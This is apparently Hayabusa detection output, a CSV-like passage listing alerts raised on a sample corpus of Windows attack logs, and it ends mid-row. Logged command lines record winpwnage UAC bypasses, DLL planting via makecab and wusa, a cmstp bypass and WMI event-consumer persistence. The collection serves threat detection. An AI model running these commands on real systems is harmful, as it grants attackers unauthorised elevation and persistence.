Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 13:32:48.200 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 9 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 
0x14241 | PID: 2796 | PGUID: 365ABB72-7D80-5CD5-0000-00100AD01300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 13:32:48.412 +00:00,IEWIN7,13,high,Persis,Bypass UAC Using Event Viewer,,rules/sigma/registry_sysmon/registry_set/registry_set_bypass_uac_using_eventviewer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 13:32:58.549 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\CompMgmtLauncher.exe"" | LID: 0x141f8 | PID: 2076 | PGUID: 365ABB72-7D86-5CD5-0000-0010CC2E1400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 13:33:29.424 +00:00,IEWIN7,1,info,,Process Created,"Cmd: whoami /priv | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""c:\Windows\System32\cmd.exe"" | LID: 0x141f8 | PID: 2524 | PGUID: 365ABB72-7DA9-5CD5-0000-00100ED31400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 13:33:29.424 +00:00,IEWIN7,1,high,PrivEsc | Disc,Run Whoami Showing Privileges,,rules/sigma/process_creation_sysmon/proc_creation_win_whoami_priv.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 13:33:29.424 +00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 13:33:29.424 +00:00,IEWIN7,1,medium,Disc,Whoami 
Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 13:49:29.586 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14241 | PID: 3552 | PGUID: 365ABB72-8169-5CD5-0000-0010D7982300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 13:49:29.789 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\NTWDBLIB.dll | Process: c:\python27\python.exe | PID: 3552 | PGUID: 365ABB72-8169-5CD5-0000-0010D7982300,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 13:49:34.946 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 1700 | PGUID: 365ABB72-816E-5CD5-0000-0010FEB62300,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 13:49:39.930 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x14241 | PID: 3608 | PGUID: 365ABB72-8173-5CD5-0000-00102FCD2300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 13:49:40.164 
+00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x141f8 | PID: 2676 | PGUID: 365ABB72-8174-5CD5-0000-0010ABE62300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 13:49:45.133 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cliconfg.exe"" | Process: C:\Windows\System32\cliconfg.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x14241 | PID: 1052 | PGUID: 365ABB72-8179-5CD5-0000-00102CFF2300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 13:49:45.378 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cliconfg.exe"" | Process: C:\Windows\System32\cliconfg.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x141f8 | PID: 880 | PGUID: 365ABB72-8179-5CD5-0000-001083182400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-11 09:50:08.248 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x136c5 | PID: 1136 | PGUID: 365ABB72-9AD0-5CD6-0000-001077FC1600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 
09:50:08.491 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 1136 | PGUID: 365ABB72-9AD0-5CD6-0000-001077FC1600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 09:50:13.494 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 3716 | PGUID: 365ABB72-9AD5-5CD6-0000-0010C4131700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 09:50:13.509 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 3716 | PGUID: 365ABB72-9AD5-5CD6-0000-0010C4131700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 09:50:18.404 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 2780 | PGUID: 365ABB72-9ADA-5CD6-0000-001012231700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 09:50:18.654 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" 
c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1369b | PID: 3448 | PGUID: 365ABB72-9ADA-5CD6-0000-0010603C1700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 09:50:26.779 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\ehome\mcx2prov.exe"" | Process: C:\Windows\ehome\Mcx2Prov.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 2936 | PGUID: 365ABB72-9AE2-5CD6-0000-00106D631700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 09:50:27.018 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\ehome\mcx2prov.exe"" | Process: C:\Windows\ehome\Mcx2Prov.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1369b | PID: 2688 | PGUID: 365ABB72-9AE2-5CD6-0000-0010337C1700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 09:50:27.030 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\ehome\CRYPTBASE.dll | Process: C:\Windows\ehome\Mcx2Prov.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 2688 | PGUID: 365ABB72-9AE2-5CD6-0000-0010337C1700 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 16:46:10.125 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 3812 | PGUID: 365ABB72-FC52-5CD6-0000-0010357F1200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-11 16:46:10.344 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 3812 | PGUID: 365ABB72-FC52-5CD6-0000-0010357F1200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-11 16:46:15.500 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3884 | PGUID: 365ABB72-FC57-5CD6-0000-00101FAF1200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-11 16:46:15.547 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: 
C:\Windows\System32\makecab.exe | PID: 3884 | PGUID: 365ABB72-FC57-5CD6-0000-00101FAF1200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-11 16:46:20.531 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3756 | PGUID: 365ABB72-FC5C-5CD6-0000-001045DB1200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-11 16:46:20.828 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1371b | PID: 1256 | PGUID: 365ABB72-FC5C-5CD6-0000-0010E9F61200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-11 16:46:26.203 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\migwiz\CRYPTBASE.dll | Process: C:\Windows\System32\migwiz\migwiz.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 3240 | PGUID: 365ABB72-FC61-5CD6-0000-0010141A1300 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-11 16:54:02.071 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 2028 | PGUID: 365ABB72-FE2A-5CD6-0000-00107E091700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-11 16:54:02.305 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 2028 | PGUID: 365ABB72-FE2A-5CD6-0000-00107E091700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-11 16:54:07.508 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 2956 | PGUID: 365ABB72-FE2F-5CD6-0000-001019201700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-11 16:54:07.524 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: 
C:\Windows\System32\makecab.exe | PID: 2956 | PGUID: 365ABB72-FE2F-5CD6-0000-001019201700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-11 16:54:12.493 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3688 | PGUID: 365ABB72-FE34-5CD6-0000-0010EB2E1700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-11 16:54:12.821 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1371b | PID: 4000 | PGUID: 365ABB72-FE34-5CD6-0000-0010B8481700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-11 16:54:18.069 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\sysprep\CRYPTBASE.dll | Process: C:\Windows\System32\sysprep\sysprep.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 2572 | PGUID: 365ABB72-FE39-5CD6-0000-001012701700 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-11 17:10:06.342 +00:00,IEWIN7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-11 17:10:10.889 +00:00,IEWIN7,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: | IP Addr: ::1 | LID: 0x1bbdce | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-11 17:10:10.889 +00:00,IEWIN7,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-11 17:10:10.889 +00:00,IEWIN7,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-11 17:28:17.176 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 2460 | PGUID: 365ABB72-0631-5CD7-0000-0010C5862100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-11 17:28:17.363 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp.ini | Process: c:\python27\python.exe | PID: 2460 | PGUID: 365ABB72-0631-5CD7-0000-0010C5862100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-11 17:28:19.567 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmstp.exe"" /au c:\users\ieuser\appdata\local\temp\tmp.ini | Process: C:\Windows\System32\cmstp.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe | LID: 0x13765 | PID: 3840 | PGUID: 365ABB72-0633-5CD7-0000-0010C6A02100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-11 17:28:19.567 +00:00,IEWIN7,1,high,PrivEsc | Evas,Bypass UAC via CMSTP,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-11 17:28:22.598 +00:00,IEWIN7,1,info,,Process Created,Cmd: c:\windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0x1371b | PID: 544 | PGUID: 365ABB72-0636-5CD7-0000-0010A6C72100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-11 17:28:22.598 +00:00,IEWIN7,13,high,Evas | Exec,CMSTP Execution Registry Event,,rules/sigma/registry_sysmon/registry_event/registry_event_cmstp_execution_by_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-11 17:28:22.598 +00:00,IEWIN7,1,high,Exec 
| Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation_sysmon/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-11 17:57:49.903 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -5 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 3140 | PGUID: 365ABB72-0D1D-5CD7-0000-001020EF1500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:22.809 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 1832 | PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:23.215 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer CREATE Name=""BotConsumer23"", ExecutablePath=""c:\Windows\System32\cmd.exe"", CommandLineTemplate=""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3184 | PGUID: 365ABB72-0D3F-5CD7-0000-0010DB251600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:23.340 +00:00,IEWIN7,20,info,,WMI Event Consumer Activity,"Created | Type: Command Line | Name: ""BotConsumer23"" | Dst: 
""c:\\Windows\\System32\\cmd.exe"" | User: IEWIN7\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:23.418 +00:00,IEWIN7,21,info,,WMI Event Consumer To Filter Activity,"Created | Consumer: ""CommandLineEventConsumer.Name=\""BotConsumer23\"""" | Filter: ""__EventFilter.Name=\""BotFilter82\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:23.450 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name=""BotFilter82""', Consumer='CommandLineEventConsumer.Name=""BotConsumer23""' | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3196 | PGUID: 365ABB72-0D3F-5CD7-0000-00108B381600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-11 17:58:23.590 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter CREATE Name=""BotFilter82"", EventNameSpace=""root\cimv2"", QueryLanguage=""WQL"", Query=""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 